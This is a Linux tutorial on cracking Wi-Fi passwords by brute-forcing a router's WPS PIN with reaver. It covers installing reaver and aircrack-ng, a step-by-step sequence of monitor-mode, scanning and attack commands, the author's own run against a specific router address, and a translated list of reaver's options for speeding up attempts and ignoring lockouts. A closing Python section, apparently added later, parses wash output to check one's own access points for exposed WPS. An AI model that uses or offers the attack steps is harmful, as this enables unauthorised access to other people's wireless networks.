This article introduces the steps for cracking a wireless Wi-Fi password under Linux; readers who need it can refer to the following.
Tool: reaver
Principle: exhaustively try PIN codes to break the security of the wireless router
Installation:
Download source
Extract
tar -xzvf reaver-1.4.tar.gz
Install the necessary software dependencies and tools
Before you compile reaver, you need to install tools such as libpcap; after that you also need aircrack-ng
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
Compile and install
Configure and compile Reaver
cd reaver-1.4
cd src
./configure
make
Download the aircrack-ng source code and compile it
Since Ubuntu 12.04, aircrack-ng is no longer included in the software repository, but we can download its source code from the Internet and compile and install it. If aircrack-ng is already installed, you do not have to install it.
./configure
make
sudo make install
Install Reaver (run in the reaver-1.4/src directory)
sudo make install
Method:
1. Enter: airmon-ng start wlan0
Turns on monitor mode (the screen shows that the 8187L driver loaded successfully, in one go!)
2. Enter: wash -i mon0 -C
Lists all wireless routers that have WPS enabled. If there is no response for a long time, press Ctrl+C to end the process, then write down the MAC of the target router you want to crack.
3. Enter: airodump-ng mon0
The NIC scans all channels in promiscuous mode and displays all AP information (including AP signal strength, ESSID, MAC, channel, encryption, etc.). Press Ctrl+C to end the scan.
Note: If you already know the other party's wireless router information, steps 2 and 3 can be omitted!
4. Enter: reaver -i mon0 -b MAC -a -S -vv
Starts exhaustively trying PIN codes.
Note: You can press Ctrl+C at any time to save progress and exit; next time, press the cursor control button "ld", then press Enter, and the process can continue.
In practice: I entered reaver -i mon0 -b D8:5D:4C:37:78:F6 -a -S -vv -d 0 (added -d 0 to speed things up) and watched the screen flash by … cool!
reaver parameter details
Required arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
The NIC's monitor interface, usually mon0
-b, --bssid=<mac> BSSID of the target AP
MAC address of the AP
Optional arguments:
-m, --mac=<mac> MAC of the host system
Specify the local MAC address
-e, --essid=<ssid> ESSID of the target AP
The ESSID of the router; generally not specified
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
The channel of the signal; if not specified, it is scanned automatically
-o, --out-file=<file> Send output to a log file [stdout]
Output log file
-s, --session=<file> Restore a previous session file
Restore a progress file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
Command to execute after the PIN succeeds
-D, --daemonize Daemonize reaver
Run reaver as a daemon
-a, --auto Auto detect the best advanced options for the target AP
Automatically detect advanced parameters for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
Use 5 GHz channels
-v, --verbose Display non-critical warnings (-vv for more)
Display non-critical warning messages; -vv shows more
-q, --quiet Only display critical messages
Show only critical information
-h, --help Show help
Advanced options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
Use the specified 4-digit or 8-digit PIN code
-d, --delay=<seconds> Set the delay between pin attempts [1]
Interval between PIN attempts, default 1 second
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
Time to wait after the AP locks WPS
-g, --max-attempts=<num> Quit after num pin attempts
Maximum number of PIN attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
Time to wait after 10 unexpected failures, default 0 seconds
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
Wait y seconds after every x PIN attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
Packet receive timeout, default 5 seconds
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
M5/M7 timeout, default 0.2 seconds
-A, --no-associate Do not associate with the AP (association must be done by another application)
Do not associate with the AP (another program must complete the association)
-N, --no-nacks Do not send NACK messages when out of order packets are received
Do not send NACK messages (if PIN attempts have been running for a while, you can try this parameter)
-S, --dh-small Use small DH keys to improve crack speed
Use small DH key values to increase speed (recommended)
-L, --ignore-locks Ignore locked state reported by the target AP
Ignore the locked status reported by the AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
Whenever an EAP failed packet is received, the WPS process is terminated
-n, --nack Target AP always sends a NACK [Auto]
Always send NACK to the target AP, default auto
-w, --win7 Mimic a Windows 7 registrar [False]
Simulate a Windows 7 registrar; default False
PS: Many factors affect wireless, so the coordination between the parameters is very important. Of course, the most critical factor is the signal.
Principle details:
What is a PIN code?
An 8-digit string printed on the wireless router's device label; it can also be found in the router's management interface, where it can be changed.
What is the use of the PIN?
In the wireless network card's companion software (such as TP-LINK QSS software), entering the 8-digit string from the wireless router device lets you log in to the encrypted wireless router.
What does it mean to exhaust the PIN?
Since the range of the wireless router's PIN value is known (8 digits, numeric only), and most devices currently have WPS turned on, brute-forcing the PIN by exhaustion to break the wireless router's security protection is feasible in theory.
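The wash listing from step 2 can also be used to check whether your own access points still advertise WPS, which is the precondition for the PIN exhaustion described above. The following is an added example, not part of the original article or of reaver; the column layout is assumed from wash in reaver 1.4, and the sample scan, addresses and inventory are constructed.

```python
import re

# Assumed columns (wash, reaver 1.4): BSSID Channel RSSI WPS-Version WPS-Locked ESSID
ROW = re.compile(
    r"^\s*((?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+(\d+)\s+(-?\d+)\s+"
    r"(\d+\.\d+)\s+(Yes|No)\s+(.*?)\s*$"
)

# Constructed sample scan; addresses are from the documentation range.
SAMPLE_WASH = """\
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------
00:00:5E:00:53:01       1            -48        1.0               No                office-ap-1
00:00:5E:00:53:02       6            -61        1.0               Yes               office-ap-2
00:00:5E:00:53:7F      11            -80        1.0               No                Neighbour WiFi
"""

# Hypothetical inventory of the BSSIDs you administer.
OWN_APS = {"00:00:5e:00:53:01", "00:00:5E:00:53:02", "00:00:5E:00:53:03"}


def parse_wash(text):
    """Return one dict per AP row; header, rule and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            bssid, chan, rssi, ver, locked, essid = m.groups()
            rows.append({"bssid": bssid.upper(), "channel": int(chan), "rssi": int(rssi),
                         "wps_version": ver, "locked": locked == "Yes", "essid": essid})
    return rows


def audit(text, inventory):
    """Classify the APs in `inventory` by what the scan reports about WPS."""
    inventory = {b.upper() for b in inventory}
    seen = {r["bssid"]: r for r in parse_wash(text) if r["bssid"] in inventory}
    return {
        # WPS advertised and accepting PIN attempts: disable WPS on these first.
        "exposed": sorted(b for b, r in seen.items() if not r["locked"]),
        # WPS advertised but currently locked: WPS is still enabled.
        "locked": sorted(b for b, r in seen.items() if r["locked"]),
        # Not listed by the scan: WPS is off, or the AP was out of range.
        "not_advertising": sorted(inventory - set(seen)),
    }


if __name__ == "__main__":
    print(audit(SAMPLE_WASH, OWN_APS))
```

An AP in the "locked" group has only rate-limited PIN attempts; turning WPS off in the router's management interface is what moves it to "not_advertising".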